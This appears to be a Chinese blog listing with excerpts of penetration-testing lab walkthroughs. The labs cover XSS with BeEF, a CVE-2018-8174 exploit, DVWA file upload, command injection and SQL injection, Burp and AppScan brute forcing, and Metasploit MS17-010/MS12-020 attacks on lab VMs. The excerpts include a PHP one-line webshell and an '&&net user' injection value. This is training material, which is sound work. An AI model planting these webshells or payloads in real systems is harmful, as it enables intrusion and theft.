安全
111
彭淦淦
破烂猴
展开
-
网络安全法以及等级保护
网络安全法的实施日期为2017年6月1日网络安全法有( 7 )章( 79 )条国家实行网络安全( 等级保护 )制度针对公共通信和信息服务、能源、交通、水利、金融、公共服务、电子政务等重要行业和领域,在网络安全等级保护制度的基础上,实行( 重点保护 )每年至少进行( 1 )次检测评估6)网络安全等级保护制度2.0国家标准于2019年5月13日发布,( 2019年12月1日 )实施7)等级保护5个规定动作是:定级、备案、安全建设整改、等级测评、监督检查8)等级保护基本框架要..原创 2020-05-11 18:04:07 · 746 阅读 · 0 评论 -
BeEF-XSS攻击
2.1 问题Kali虚拟机(192.168.111.132)搭建BeEF服务 宿主机(192.168.111.1)搭建正常网站 Win2008虚拟机(192.168.111.133)模拟用户被攻击2.2 步骤实现此案例需要按照如下步骤进行。1)kali中运行SEToolkit,输入1回车,如图-11所示图-112)输入4回车,如图-12所示图-123)输入5回车,如图-13所示图-134)配置IP和端口,开始监听,如图-14所示图-145)在原创 2020-05-11 18:02:25 · 520 阅读 · 0 评论 -
BeEF-XSS攻击
6.1 问题Kali虚拟机(192.168.111.132)搭建BeEF服务 宿主机(192.168.111.1)搭建正常网站 Win2008虚拟机(192.168.111.133)模拟用户被攻击6.2 步骤实现此案例需要按照如下步骤进行。1)Kali虚拟机安装BeEF,依次运行命令apt-get update,apt-get install beef-xss,安装完成后启动beef-xss,用户名beef,自定义密码例如123456,如图-11和图-12所示图-11图-1原创 2020-05-11 18:01:08 · 1004 阅读 · 0 评论 -
XSS攻击
5.1 问题Kali虚拟机(192.168.111.132)搭建恶意网站 宿主机(192.168.111.1)搭建正常网站 Win2008虚拟机(192.168.111.133)模拟用户被攻击5.2 步骤实现此案例需要按照如下步骤进行。步骤一:准备恶意页面1)到github上面找exp,访问https://github.com/Sch01ar/CVE-2018-8174_EXP,下载后运行c:\python27\python CVE-2018-8174.py -u http://192原创 2020-05-11 18:12:18 · 338 阅读 · 0 评论 -
菜刀实施文件上传漏洞攻击:
4.1 问题DVWA搭建在Win2008虚拟机(192.168.111.142) 在宿主机访问DVWA,DVWA级别设置Low 利用文件上传漏洞,使用一句话木马和菜刀攻击4.2 步骤实现此案例需要按照如下步骤进行。1)访问DVWA,选择Low级别,然后点击“File Upload”,如图-37所示图-372)使用一句话木马<?php @eval($_POST['config']); ?>,将一句话保存到phpxm.php中上传,如图-38所示图-383)原创 2020-05-09 09:25:09 · 872 阅读 · 0 评论 -
kali实施文件上传漏洞攻击:
3.1 问题1)DVWA搭建在Win2008虚拟机(192.168.111.142) 2)在宿主机访问DVWA,DVWA级别分别设置Low、Medium 3)利用文件上传漏洞,使用kali(192.168.111.142)攻击3.2 步骤实现此案例需要按照如下步骤进行。步骤一:DVWA级别设置Low1)访问DVWA,选择Low级别,然后点击“File Upload”,如图-26所示图-262)使用kali下的weevely来生成一个webshell,密码123456,如图-原创 2020-05-09 09:23:49 · 2570 阅读 · 0 评论 -
命令注入: DVWA级别分别设置Low、Medium、High、Impossible 进行命令注入
2.2 步骤实现此案例需要按照如下步骤进行。步骤一:DVWA级别设置Low1)访问DVWA,选择Low级别,然后点击“Command Injection”,如图-15所示图-152)输入192.168.111.142并提交,正常显示结果,如图-16所示图-163)输入192.168.111.142&&net user并提交,爆出了用户名,如图-17所示图-17步骤二:DVWA级别设置Medium1)访问DVWA,选择Medium级别,然后点原创 2020-05-09 09:23:12 · 5288 阅读 · 0 评论 -
SQL注入: 安装Sqlmap DVWA设置安全级别为Low 使用Sqlmap进行SQL注入
1.2 步骤实现此案例需要按照如下步骤进行。步骤一:安装SqlmapSqlmap是一个基于Python的开源的SQL注入渗透测试工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,目前支持Access、MSSQL、MySQL、Oracle、PostgreSQL等多种数据库类型。首先在Windows系统中安装Python 2.7,安装Sqlmap只需要在https://github.com/sqlmapproject/sqlmap下载ZIP压缩包,直接解压即可。然后运行sqlmap原创 2020-05-09 09:22:36 · 1094 阅读 · 0 评论 -
部署Burp Suite: 安装Burp Suite 启动Burp Suite
4.2 步骤实现此案例需要按照如下步骤进行。Burp Suite 是用于攻击Web 应用程序的集成平台,包含了许多工具。Burp Suite的主要模块包括Proxy、Spider、Scanner、Intruder、Repeater、Sequencer、Decoder和Comparer。本案例主要利用了Intruder模块,用于Web暴力破解。当Burp Suite 运行后,Proxy开启默认的8080 端口作为本地代理接口。通过设置一个浏览器使用其代理服务器,所有的网站流量可以被拦截,查看和修改原创 2020-05-09 09:20:44 · 905 阅读 · 0 评论 -
搭建靶机DVWA: Win2008虚拟机安装phpstudy2016 搭建靶机DVWA
3.2 步骤实现此案例需要按照如下步骤进行。DVWA是一个PHP站点的源码,只需要将此源码放到PHP+MySQL环境中再稍加配置即可。1)Windows 虚拟机(IP地址192.168.111.142)中运行phpStudy20161103.exe自解压到C:\phpStudy,然后自动启动,如图-17所示。图-172)解压DVWA-master.zip到C:\phpStudy\WWW\DVWA-master,如图-18所示。图-183)配置DVWA连接数据库,编辑con原创 2020-05-09 09:19:59 · 1338 阅读 · 0 评论 -
破解表单:使用AppScan对网站http://demo.testfire.net进行表单破解。
2.2 步骤实现此案例需要按照如下步骤进行。AppScan集成了一个可以破解网站的用户名称和密码的工具Authentication Tester,如图-5所示。图-5接下来介绍破解表单的步骤及操作。1)点击“设置”,如图-6所示。图-62)打开内置的浏览器,如图-7所示。图-73)访问网站,查找登录页,如图-8和图-9所示。图-8图-94)将登录页的网址复制到内置的浏览器并访问,如图-10和图-11所示。图-10图-11原创 2020-05-09 09:18:13 · 1680 阅读 · 0 评论 -
Web漏洞评估: 安装AppScan 使用AppScan渗透测试
1.2 步骤实现此案例需要按照如下步骤进行。1)AppScan 8.0版本在Windows 7可以直接安装,在Windows 10安装需要先安装.NET Framework 3.5。安装完成后新建扫描,输入测试网址http://demo.testfire.net,如图-1所示。图-1接下来选择测试策略“完成”,该策略包含所有的AppScan测试,然后开始扫描。2)扫描完成后点击“应用建议”,如图-2所示。图-23)经过一段时间,扫描完成后的结果如图-3所示,扫描出很多安全原创 2020-05-09 09:17:32 · 639 阅读 · 0 评论 -
MS17-010漏洞入侵: 利用MS17-010漏洞入侵Win 2008 R2 上传下载文件 破解密码 远程登录
4.2 步骤实现此案例需要按照如下步骤进行。1)在kali上启动msfconsole,漏洞攻击如图-17、图-18和图-19所示图-17图-18图-192)上传下载文件,如图-20和图-21所示图-20图-213)破解密码如图-22所示,密码的hash值可以访问www.cmd5.com破解图-224)在kali上新建终端,然后运行...原创 2020-05-09 09:16:02 · 1447 阅读 · 0 评论 -
MS12-020漏洞攻击: 在Win2008 R2上开启远程桌面 利用MS12-020进行漏洞攻击 打补丁后再次测试漏洞攻击
3.2 步骤实现此案例需要按照如下步骤进行。1)在kali上扫描靶机,如图-13所示图-132)在kali上启动msfconsole,首先测试漏洞攻击,然后进行攻击,如图-14、图-15和图-16所示图-14图-15图-163)打补丁Windows6.1-KB2621440-x64.msu后再次测试,漏洞攻击没有效果了...原创 2020-05-08 11:35:19 · 2589 阅读 · 0 评论 -
Nessus漏洞扫描: 下载并安装Nessus 扫描一台Windows 2008 R2虚拟机
2.2 步骤实现此案例需要按照如下步骤进行。1)https://www.tenable.com/downloads/nessus?loginAttempted=true下载,注册获得激活码,选择免费版,如图-1和图-2所示图-1图-22)执行安装程序,之后提示创建账户,如图-3、图-4和图-5所示图-3图-4图-53)安装完后自动登录,点击“...原创 2020-05-08 11:33:58 · 1698 阅读 · 0 评论 -
DoS与DDoS攻击: 什么是DoS攻击? 什么是DDoS攻击? 如何防范DDoS攻击?
1.2 步骤实现此案例需要按照如下步骤进行。1)DoS,拒绝服务(Denial of Service)指的是通过各种手段,最终导致目标系统崩溃、失去响应,从而无法正常提供资源或服务的情况。2)DDoS 攻击,即 Distributed Denial of Service(分布式拒绝服务),这种方式的攻击方不再是一台主机,数量上呈现规模化,可能是分布在不同网络、不同位置的成千上万的主机(通常称...原创 2020-05-08 11:32:37 · 1842 阅读 · 0 评论